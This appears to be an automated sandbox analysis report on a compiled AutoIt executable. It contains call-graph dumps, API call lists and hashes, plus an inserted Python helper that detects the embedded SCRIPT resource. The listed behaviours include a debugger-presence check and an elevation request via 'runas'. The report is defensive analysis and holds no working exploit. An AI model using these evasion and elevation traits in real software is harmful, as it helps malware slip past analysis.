110086 404dc1 110084->110086 110087 404d89 110084->110087 110088 404ec7 69 API calls 110085->110088 110215 46991b 95 API calls 110086->110215 110204 404e89 CreateStreamOnHGlobal 110087->110204 110096 404cd5 110088->110096 110091 404f0b 74 API calls 110091->110096 110092 404d69 110092->109867 110094 43d8a7 110095 404ee5 85 API calls 110094->110095 110097 43d8bb 110095->110097 110096->110091 110096->110092 110096->110094 110210 404ee5 110096->110210 110098 404f0b 74 API calls 110097->110098 110098->110092 110100 404f1d 110099->110100 110101 43d9cd 110099->110101 110239 4255e2 110100->110239 110104 469109 
110371 468f5f 110104->110371 110106 46911f 110106->109875 110108 43d990 110107->110108 110109 404ed6 110107->110109 110376 425c60 110109->110376 110111 404ede 110113 404bd0 110112->110113 110114 404c0c LoadLibraryA 110112->110114 110113->110066 110113->110069 110114->110113 110115 404c1d GetProcAddress 110114->110115 110115->110113 110117 42527c _raise 110116->110117 110118 42528f 110117->110118 110121 4252c0 110117->110121 110165 428b28 58 API calls __getptd_noexit 110118->110165 110120 425294 110166 428db6 9 API calls _raise 110120->110166 110135 4304e8 110121->110135 110124 4252c5 110125 4252db 110124->110125 110126 4252ce 110124->110126 110128 425305 110125->110128 110129 4252e5 110125->110129 110167 428b28 58 API calls __getptd_noexit 110126->110167 110150 430607 110128->110150 110168 428b28 58 API calls __getptd_noexit 110129->110168 110130 42529f _raise @_EH4_CallFilterFunc@8 110130->110072 110136 4304f4 _raise 110135->110136 110137 429c0b __lock 58 API calls 110136->110137 110147 430502 110137->110147 110138 430576 110170 4305fe 110138->110170 110139 43057d 110175 42881d 58 API calls 2 library calls 110139->110175 110142 4305f3 _raise 110142->110124 110143 430584 110143->110138 110176 429e2b InitializeCriticalSectionAndSpinCount 110143->110176 110144 429c93 __mtinitlocknum 58 API calls 110144->110147 110147->110138 110147->110139 110147->110144 110173 426c50 59 API calls __lock 110147->110173 110174 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110147->110174 110148 4305aa EnterCriticalSection 110148->110138 110159 430627 __wopenfile 110150->110159 110151 430641 110181 428b28 58 API calls __getptd_noexit 110151->110181 110152 4307fc 110152->110151 110157 43085f 110152->110157 110154 430646 110182 428db6 9 API calls _raise 110154->110182 110156 425310 110169 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 110156->110169 110178 4385a1 110157->110178 110159->110151 110159->110152 110183 4237cb 60 API calls 2 library calls 110159->110183 
110161 4307f5 110161->110152 110184 4237cb 60 API calls 2 library calls 110161->110184 110163 430814 110163->110152 110185 4237cb 60 API calls 2 library calls 110163->110185 110165->110120 110166->110130 110167->110130 110168->110130 110169->110130 110177 429d75 LeaveCriticalSection 110170->110177 110172 430605 110172->110142 110173->110147 110174->110147 110175->110143 110176->110148 110177->110172 110186 437d85 110178->110186 110180 4385ba 110180->110156 110181->110154 110182->110156 110183->110161 110184->110163 110185->110152 110187 437d91 _raise 110186->110187 110188 437da7 110187->110188 110190 437ddd 110187->110190 110189 428b28 _raise 58 API calls 110188->110189 110191 437dac 110189->110191 110192 437e4e __wsopen_nolock 109 API calls 110190->110192 110193 428db6 _raise 9 API calls 110191->110193 110194 437df9 110192->110194 110196 437db6 _raise 110193->110196 110195 437e22 __wsopen_helper LeaveCriticalSection 110194->110195 110195->110196 110196->110180 110198 404b83 110197->110198 110199 404c3f LoadLibraryA 110197->110199 110198->110078 110198->110079 110199->110198 110200 404c50 GetProcAddress 110199->110200 110200->110198 110202 420db6 Mailbox 59 API calls 110201->110202 110203 405240 110202->110203 110203->110084 110205 404ea3 FindResourceExW 110204->110205 110207 404ec0 110204->110207 110206 43d933 LoadResource 110205->110206 110205->110207 110206->110207 110208 43d948 SizeofResource 110206->110208 110207->110085 110208->110207 110209 43d95c LockResource 110208->110209 110209->110207 110211 404ef4 110210->110211 110212 43d9ab 110210->110212 110216 42584d 110211->110216 110214 404f02 110214->110096 110215->110085 110219 425859 _raise 110216->110219 110217 42586b 110229 428b28 58 API calls __getptd_noexit 110217->110229 110218 425891 110231 426c11 110218->110231 110219->110217 110219->110218 110222 425870 110230 428db6 9 API calls _raise 110222->110230 110226 4258a6 110238 4258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 110226->110238 110228 
112215->112435 112436 469e4a 89 API calls 4 library calls 112218->112436 112434 469e4a 89 API calls 4 library calls 112219->112434 112220 47bc6b 341 API calls 112220->112229 112222 40b2b6 112428 40f6a3 341 API calls 112222->112428 112223 409ea0 341 API calls 112223->112229 112225 44086a 112432 409c90 59 API calls Mailbox 112225->112432 112227 440878 112433 469e4a 89 API calls 4 library calls 112227->112433 112229->112196 112229->112213 112229->112214 112229->112217 112229->112220 112229->112222 112229->112223 112229->112225 112229->112227 112230 44085c 112229->112230 112231 40b21c 112229->112231 112233 420db6 59 API calls Mailbox 112229->112233 112236 456e8f 59 API calls 112229->112236 112243 47445a 341 API calls 112229->112243 112244 411fc3 112229->112244 112284 47df23 112229->112284 112287 468715 112229->112287 112291 482141 112229->112291 112329 47e4d1 112229->112329 112335 46d07b 112229->112335 112382 47c2e0 112229->112382 112414 467956 112229->112414 112420 45617e 112229->112420 112425 409c90 59 API calls Mailbox 112229->112425 112429 47c193 85 API calls 2 library calls 112229->112429 112230->112192 112230->112217 112426 409d3c 60 API calls Mailbox 112231->112426 112233->112229 112234 40b22d 112427 409d3c 60 API calls Mailbox 112234->112427 112236->112229 112243->112229 112245 409a98 59 API calls 112244->112245 112246 411fdb 112245->112246 112248 420db6 Mailbox 59 API calls 112246->112248 112250 446585 112246->112250 112249 411ff4 112248->112249 112252 412004 112249->112252 112458 4057a6 60 API calls Mailbox 112249->112458 112251 412029 112250->112251 112461 46f574 59 API calls 112250->112461 112255 409b3c 59 API calls 112251->112255 112260 412036 112251->112260 112254 409837 84 API calls 112252->112254 112256 412012 112254->112256 112257 4465cd 112255->112257 112258 4057f6 67 API calls 112256->112258 112259 4465d5 112257->112259 112257->112260 112261 412021 112258->112261 112263 409b3c 59 API calls 112259->112263 112262 405cdf 2 API calls 112260->112262 
112261->112250 112261->112251 112460 4058ba CloseHandle 112261->112460 112265 41203d 112262->112265 112263->112265 112266 4465e7 112265->112266 112267 412057 112265->112267 112269 420db6 Mailbox 59 API calls 112266->112269 112268 407667 59 API calls 112267->112268 112270 41205f 112268->112270 112271 4465ed 112269->112271 112437 405572 112270->112437 112273 446601 112271->112273 112462 405850 ReadFile SetFilePointerEx 112271->112462 112277 446605 _memmove 112273->112277 112463 4676c4 59 API calls 2 library calls 112273->112463 112275 41206e 112275->112277 112452 409a3c 112275->112452 112279 412082 Mailbox 112280 4120bc 112279->112280 112281 405c6f CloseHandle 112279->112281 112280->112229 112282 4120b0 112281->112282 112282->112280 112459 4058ba CloseHandle 112282->112459 112285 47cadd 130 API calls 112284->112285 112286 47df33 112285->112286 112286->112229 112288 46871e 112287->112288 112289 468723 112287->112289 112467 4677b3 112288->112467 112289->112229 112292 407667 59 API calls 112291->112292 112293 482158 112292->112293 112294 409837 84 API calls 112293->112294 112295 482167 112294->112295 112296 407a16 59 API calls 112295->112296 112297 48217a 112296->112297 112298 409837 84 API calls 112297->112298 112299 482187 112298->112299 112300 4821a1 112299->112300 112301 482215 112299->112301 112302 409b3c 59 API calls 112300->112302 112303 409837 84 API calls 112301->112303 112304 4821a6 112302->112304 112305 48221a 112303->112305 112306 482204 112304->112306 112309 4821bd 112304->112309 112307 482228 112305->112307 112308 482246 112305->112308 112312 409a98 59 API calls 112306->112312 112310 409a98 59 API calls 112307->112310 112311 48225b 112308->112311 112314 409b3c 59 API calls 112308->112314 112313 40784b 59 API calls 112309->112313 112326 482211 Mailbox 112310->112326 112315 482270 112311->112315 112318 409b3c 59 API calls 112311->112318 112312->112326 112317 4821ca 112313->112317 112314->112311 112316 407f77 59 API calls 112315->112316 112319 48228a 
112316->112319 112320 407b2e 59 API calls 112317->112320 112318->112315 112490 45f401 62 API calls Mailbox 112319->112490 112322 4821d8 112320->112322 112323 40784b 59 API calls 112322->112323 112324 4821f1 112323->112324 112325 407b2e 59 API calls 112324->112325 112328 4821ff 112325->112328 112326->112229 112327 409a3c 59 API calls 112327->112326 112328->112327 112333 47e4e4 112329->112333 112330 409837 84 API calls 112331 47e521 112330->112331 112491 467729 112331->112491 112333->112330 112334 47e4f3 112333->112334 112334->112229 112336 46d09a 112335->112336 112337 46d0a5 112335->112337 112338 409b3c 59 API calls 112336->112338 112339 46d17f Mailbox 112337->112339 112342 407667 59 API calls 112337->112342 112338->112337 112340 420db6 Mailbox 59 API calls 112339->112340 112378 46d188 Mailbox 112339->112378 112341 46d1c8 112340->112341 112343 46d1d4 112341->112343 112533 4057a6 60 API calls Mailbox 112341->112533 112344 46d0c9 112342->112344 112348 409837 84 API calls 112343->112348 112346 407667 59 API calls 112344->112346 112347 46d0d2 112346->112347 112349 409837 84 API calls 112347->112349 112350 46d1ec 112348->112350 112352 46d0de 112349->112352 112351 4057f6 67 API calls 112350->112351 112353 46d1fb 112351->112353 112354 40459b 59 API calls 112352->112354 112355 46d233 112353->112355 112356 46d1ff GetLastError 112353->112356 112357 46d0f3 112354->112357 112361 46d295 112355->112361 112362 46d25e 112355->112362 112358 46d218 112356->112358 112359 407b2e 59 API calls 112357->112359 112358->112378 112534 4058ba CloseHandle 112358->112534 112360 46d126 112359->112360 112364 46d178 112360->112364 112369 463c37 3 API calls 112360->112369 112365 420db6 Mailbox 59 API calls 112361->112365 112363 420db6 Mailbox 59 API calls 112362->112363 112366 46d263 112363->112366 112368 409b3c 59 API calls 112364->112368 112370 46d29a 112365->112370 112371 46d274 112366->112371 112373 407667 59 API calls 112366->112373 112368->112339 112372 46d136 112369->112372 112375 407667 59 
API calls 112370->112375 112370->112378 112535 47fbce 59 API calls 2 library calls 112371->112535 112372->112364 112374 46d13a 112372->112374 112373->112371 112377 407de1 59 API calls 112374->112377 112375->112378 112379 46d147 112377->112379 112378->112229 112532 463a2a 63 API calls Mailbox 112379->112532 112381 46d150 Mailbox 112381->112364 112383 407667 59 API calls 112382->112383 112384 47c2f4 112383->112384 112385 407667 59 API calls 112384->112385 112386 47c2fc 112385->112386 112387 407667 59 API calls 112386->112387 112388 47c304 112387->112388 112389 409837 84 API calls 112388->112389 112410 47c312 112389->112410 112390 407bcc 59 API calls 112390->112410 112391 47c4fb 112392 47c528 Mailbox 112391->112392 112393 409a3c 59 API calls 112391->112393 112392->112229 112393->112392 112394 47c4e2 112395 407cab 59 API calls 112394->112395 112397 47c4ef 112395->112397 112396 47c4fd 112399 407cab 59 API calls 112396->112399 112402 407b2e 59 API calls 112397->112402 112398 407924 59 API calls 112398->112410 112403 47c50c 112399->112403 112400 408047 59 API calls 112400->112410 112401 407e4f 59 API calls 112404 47c3a9 CharUpperBuffW 112401->112404 112402->112391 112405 407b2e 59 API calls 112403->112405 112536 40843a 68 API calls 112404->112536 112405->112391 112406 407e4f 59 API calls 112407 47c469 CharUpperBuffW 112406->112407 112537 40c5a7 69 API calls 2 library calls 112407->112537 112410->112390 112410->112391 112410->112392 112410->112394 112410->112396 112410->112398 112410->112400 112410->112401 112410->112406 112411 409837 84 API calls 112410->112411 112412 407b2e 59 API calls 112410->112412 112413 407cab 59 API calls 112410->112413 112411->112410 112412->112410 112413->112410 112415 467962 112414->112415 112416 420db6 Mailbox 59 API calls 112415->112416 112417 467970 112416->112417 112418 46797e 112417->112418 112419 407667 59 API calls 112417->112419 112418->112229 112419->112418 112538 4560c0 112420->112538 112422 45618c 112422->112229 112423->112214 
112424->112214 112425->112229 112426->112234 112427->112222 112428->112196 112429->112229 112430->112203 112431->112230 112432->112230 112433->112230 112434->112217 112435->112218 112436->112217 112438 4055a2 112437->112438 112439 40557d 112437->112439 112440 407d8c 59 API calls 112438->112440 112439->112438 112444 40558c 112439->112444 112443 46325e 112440->112443 112441 46328d 112441->112275 112443->112441 112464 4631fa ReadFile SetFilePointerEx 112443->112464 112465 407924 59 API calls 2 library calls 112443->112465 112445 405ab8 59 API calls 112444->112445 112447 46337e 112445->112447 112448 4054d2 61 API calls 112447->112448 112449 46338c 112448->112449 112451 46339c Mailbox 112449->112451 112466 4077da 61 API calls Mailbox 112449->112466 112451->112275 112453 409a87 112452->112453 112454 409a48 112452->112454 112455 408047 59 API calls 112453->112455 112456 420db6 Mailbox 59 API calls 112454->112456 112457 409a5b 112455->112457 112456->112457 112457->112279 112458->112252 112459->112280 112460->112250 112461->112250 112462->112273 112463->112277 112464->112443 112465->112443 112466->112451 112468 4678ea 112467->112468 112469 4677ca 112467->112469 112468->112289 112470 46780a 112469->112470 112471 4677e2 112469->112471 112472 467821 112469->112472 112473 420db6 Mailbox 59 API calls 112470->112473 112471->112470 112474 4677f2 112471->112474 112477 420db6 Mailbox 59 API calls 112472->112477 112484 46783e 112472->112484 112487 467800 Mailbox _memmove 112473->112487 112480 420db6 Mailbox 59 API calls 112474->112480 112475 467877 112479 420db6 Mailbox 59 API calls 112475->112479 112476 467869 112478 420db6 Mailbox 59 API calls 112476->112478 112477->112484 112478->112487 112481 46787d 112479->112481 112480->112487 112488 46746b 59 API calls Mailbox 112481->112488 112482 420db6 Mailbox 59 API calls 112482->112468 112484->112475 112484->112476 112484->112487 112485 467889 112489 405a15 61 API calls Mailbox 112485->112489 112487->112482 112488->112485 112489->112487 
112490->112328 112492 467736 112491->112492 112493 420db6 Mailbox 59 API calls 112492->112493 112494 46773d 112493->112494 112497 465b7a 112494->112497 112496 467780 Mailbox 112496->112334 112498 407e4f 59 API calls 112497->112498 112499 465b8d CharLowerBuffW 112498->112499 112501 465ba0 112499->112501 112500 4079f2 59 API calls 112500->112501 112501->112500 112502 465baa _memset Mailbox 112501->112502 112503 465bda 112501->112503 112502->112496 112505 4079f2 59 API calls 112503->112505 112506 465bec 112503->112506 112504 420db6 Mailbox 59 API calls 112509 465c1a 112504->112509 112505->112506 112506->112504 112511 465c39 112509->112511 112530 465ab6 59 API calls 112509->112530 112510 465c78 112510->112502 112512 420db6 Mailbox 59 API calls 112510->112512 112515 465cd7 112511->112515 112513 465c92 112512->112513 112514 420db6 Mailbox 59 API calls 112513->112514 112514->112502 112516 407667 59 API calls 112515->112516 112517 465d09 112516->112517 112518 407667 59 API calls 112517->112518 112519 465d12 112518->112519 112520 407667 59 API calls 112519->112520 112525 465d1b _wcscmp 112520->112525 112521 407bcc 59 API calls 112521->112525 112522 465ff0 Mailbox 112522->112510 112523 423606 GetStringTypeW 112523->112525 112525->112521 112525->112522 112525->112523 112526 42358a 59 API calls 112525->112526 112527 465cd7 60 API calls 112525->112527 112528 407924 59 API calls 112525->112528 112529 408047 59 API calls 112525->112529 112531 42362c GetStringTypeW _iswctype 112525->112531 112526->112525 112527->112525 112528->112525 112529->112525 112530->112509 112531->112525 112532->112381 112533->112343 112534->112378 112535->112378 112536->112410 112537->112410 112539 4560e8 112538->112539 112540 4560cb 112538->112540 112539->112422 112540->112539 112542 4560ab 59 API calls Mailbox 112540->112542 112542->112540
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: d$w
                    • API String ID: 0-2400632791
                    • Opcode ID: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                    • Instruction ID: 5704ff38ac9576bfa65f8f0110b6c50fc733488f3e6868b24dffeff4dafdee91
                    • Opcode Fuzzy Hash: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                    • Instruction Fuzzy Hash: FAC13135A0C340AFDA354B248C5AF7A3EE0EB61B20F5C47D6F656AA0F3E7259C05D612

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                    • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                    • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                      • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                      • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                      • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                      • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                      • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                      • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                      • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%I
                    • API String ID: 529118366-2806069697
                    • Opcode ID: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                    • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                    • Opcode Fuzzy Hash: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                    • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                    Control-flow Graph

control_flow_graph of the function at 004049A0 (executed and not-executed basic blocks are distinguished in the interactive view): call 00407667, GetVersionExW, call 00407BCC, call 00407D2C, call 00407726, GetCurrentProcess, IsWow64Process, call 00404B37 (LoadLibraryA/GetProcAddress), GetNativeSystemInfo, FreeLibrary, and GetSystemInfo at two call sites (00404B1F and 00404B2B) on the paths where GetNativeSystemInfo is not resolved.
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004049CD
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                    • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                    • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                    • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                    • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                    • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                    Control-flow Graph

control_flow_graph of the function at 00404E89 (executed and not-executed basic blocks are distinguished in the interactive view): CreateStreamOnHGlobal, then FindResourceExW, LoadResource, SizeofResource and LockResource in sequence; the failure edge of each of the four resource calls, and of the stream creation, leads to the common exit block at 00404EC0-00404EC6.
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                    • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                    • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                    • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                    • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                    • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                    • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
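The five resource calls listed above are how a compiled AutoIt stub locates its embedded script: FindResourceExW with type 0x0000000A (RT_RCDATA) and name "SCRIPT", followed by LoadResource, SizeofResource and LockResource, after a stream has been created with CreateStreamOnHGlobal. The following Python is an added example, not code from this report or from AutoIt: it walks the raw bytes of a PE .rsrc section and reports whether an RT_RCDATA/"SCRIPT" entry is present, which is one structural check a triage script can use to support a "compiled AutoIt script" verdict. The section layout (IMAGE_RESOURCE_DIRECTORY tree with type, name and language levels and an IMAGE_RESOURCE_DATA_ENTRY leaf) is the documented PE format; `build_rsrc` and the values it is called with are a constructed fixture, and extracting the section bytes from a real file (for example from pefile's section list) is assumed rather than shown.

```python
"""Find the resource a compiled AutoIt stub loads its script from.

The loader on this page calls FindResourceExW(hModule, 0xA (RT_RCDATA), "SCRIPT", 0)
and then LoadResource/SizeofResource/LockResource.  This walker checks the raw
bytes of a PE .rsrc section for that RT_RCDATA/"SCRIPT" entry.  Offsets inside
the section are relative to the section start; the leaf holds the data RVA and size.
"""
import struct

RT_RCDATA = 10              # the 0x0000000A type argument in the FindResourceExW call above
SCRIPT_RESOURCE = "SCRIPT"  # the resource name argument in the same call


def _read_dir(rsrc, off):
    """Yield (key, target_offset, is_subdir) for each entry of the
    IMAGE_RESOURCE_DIRECTORY at `off`; `key` is an int ID or a str name."""
    if off + 16 > len(rsrc):
        raise ValueError("resource directory at %#x is truncated" % off)
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    pos = off + 16
    for _ in range(n_named + n_id):
        if pos + 8 > len(rsrc):
            raise ValueError("resource directory entry at %#x is truncated" % pos)
        name, data = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        if name & 0x80000000:                    # named entry -> IMAGE_RESOURCE_DIR_STRING_U
            soff = name & 0x7FFFFFFF
            if soff + 2 > len(rsrc):
                raise ValueError("resource name string at %#x is truncated" % soff)
            (length,) = struct.unpack_from("<H", rsrc, soff)
            raw = rsrc[soff + 2 : soff + 2 + 2 * length]
            if len(raw) != 2 * length:
                raise ValueError("resource name string at %#x is truncated" % soff)
            key = raw.decode("utf-16-le")
        else:
            key = name & 0xFFFF                   # numeric ID (type, name or language)
        yield key, data & 0x7FFFFFFF, bool(data & 0x80000000)


def find_autoit_script(rsrc):
    """Return (rva, size) of the RT_RCDATA/"SCRIPT" resource, or None if absent.

    Level 1 is keyed by type, level 2 by name, level 3 by language; the leaf is
    an IMAGE_RESOURCE_DATA_ENTRY (OffsetToData RVA, Size, CodePage, Reserved).
    The name comparison is case-insensitive, as FindResourceExW's is."""
    for key, off, is_dir in _read_dir(rsrc, 0):
        if key != RT_RCDATA or not is_dir:
            continue
        for name, off2, is_dir2 in _read_dir(rsrc, off):
            if not (isinstance(name, str) and name.upper() == SCRIPT_RESOURCE and is_dir2):
                continue
            for _lang, off3, is_dir3 in _read_dir(rsrc, off2):
                if is_dir3:                       # a fourth level is malformed; skip it
                    continue
                if off3 + 16 > len(rsrc):
                    raise ValueError("resource data entry at %#x is truncated" % off3)
                rva, size = struct.unpack_from("<II", rsrc, off3)
                return rva, size
    return None


def is_compiled_autoit(rsrc):
    """Triage predicate: True when the section carries the SCRIPT resource.
    A malformed or truncated section counts as 'not found' instead of raising."""
    try:
        return find_autoit_script(rsrc) is not None
    except (ValueError, struct.error):
        return False


def build_rsrc(type_id, name, lang, data_rva, data_size):
    """Construct a minimal one-resource section (test fixture, not from any real file).
    Layout: dir0 @0, dir1 @24, dir2 @48, data entry @72, name string @88."""
    def directory(n_named, n_id):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    blob = directory(0, 1) + struct.pack("<II", type_id, 0x80000000 | 24)
    blob += directory(1, 0) + struct.pack("<II", 0x80000000 | 88, 0x80000000 | 48)
    blob += directory(0, 1) + struct.pack("<II", lang, 72)
    blob += struct.pack("<IIII", data_rva, data_size, 0, 0)
    blob += struct.pack("<H", len(name)) + name.encode("utf-16-le")
    return blob


if __name__ == "__main__":
    sample = build_rsrc(RT_RCDATA, SCRIPT_RESOURCE, 0x409, 0x12000, 0x4A2)
    print(find_autoit_script(sample))   # (73728, 1186)
```

The presence of the resource is an indicator, not proof: a repacked stub can rename it, and a legitimately compiled AutoIt tool carries exactly the same entry, so the result belongs next to the rest of the report rather than on its own.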
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
